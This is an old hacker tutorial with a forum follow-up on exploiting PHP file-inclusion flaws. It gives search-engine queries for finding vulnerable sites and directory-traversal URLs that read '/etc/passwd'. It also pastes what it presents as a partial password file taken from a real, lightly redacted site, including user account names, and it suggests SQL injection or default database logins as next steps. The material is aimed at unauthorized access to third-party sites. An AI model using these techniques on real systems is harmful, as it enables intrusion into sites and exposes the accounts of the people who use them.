##

" this exploit is known..Old news for some..but new to others ..just my version of events "

===========================


URL manipulation...PHP style

by ComSec

date: 15/5/2003

===========================


OUTLINE:

target = password file

password file will most prob be shadowed but you get a lot of info , user names , paths, mySQL , PostgreSQL db , etc, etc

you could then test the SQL server for sa access if set to default or SQL injection methods to gain access to the database

or use the info for other methods to access the account .... anyway on to the exploit

===========================


there are several search strings that will work here are a couple

SEARCH:

inurl:index.php?content=
inurl:index.php?filename=

search links = 14,000 to 707,000 +

===========================


EXAMPLES:

http://blahblah.com/index.php?content=contact.php

replace contact.php with style.css can reveal on some sites if your lucky ,links and paths etc


http://www.blahblah.com/index.php?content=style.css


other sites will return a page error revealing table details for a possible alternative route to access


i then added to the equal path ../../../../../../../etc/passwd


http://www.blahblah.com/index.php?content= ../../../../../../../etc/passwd


if the site is can be exploited it will return in your browser the password file

===========================


ACTUAL EXAMPLE ....edited site ,and chopped section of password file

http://www.xxxxx.bc.ca/index.php?content=...../../etc/passwd

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:100:sync:/bin:/bin/sync games:x:5:100:games:/usr/games:/bin/sh man:x:6:100:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh majordom:x:30:31:Majordomo:/usr/lib/majordomo:/bin/sh postgres:x:31:32:postgres:/var/lib/postgres:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh operator:x:37:37:Operator:/var:/bin/sh list:x:38:38:SmartList:/var/list:/bin/sh irc:x:39:39:ircd:/var:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats/gnats-db:/bin/sh nobody:x:65534:65534:nobody:/home:/bin/sh ftp:x:100:65534::/home/ftp:/bin/false jvogt:x:1002:1002:,,,:/home/jvogt:/bin/false lhay:x:1005:1005:,,,:/home/lhay:/bin/false rgiroday:x:1004:1004:,,,:/home/rgiroday:/bin/false spider:x:1006:1006:,,,:/var/www:/bin/bash nwaller:x:1008:1008:,,,:/home/nwaller:/bin/false donna:x:1009:1009:,,,:/home/donna:/bin/bash jgoodrich:x:1011:1011:,,,:/home/jgoodrich:/bin/bash

EOF

*******************

tutorial by ComSec

*******************

feel free to use/post for educationally purposes.....


http://comsec.governmentsecurity.org


------------------------------------

After doing a little google digging I found a few sites that were using a variation of the page.

http://www.somepoorsite.com/index.php?show=main

A feable attempt to hide the vulnerability. But it's the same thing

thanks GSecur

there are loads of ways to exploit this example.... and others to exploit cgi with the same method just a case of toying with the URL's to find what works...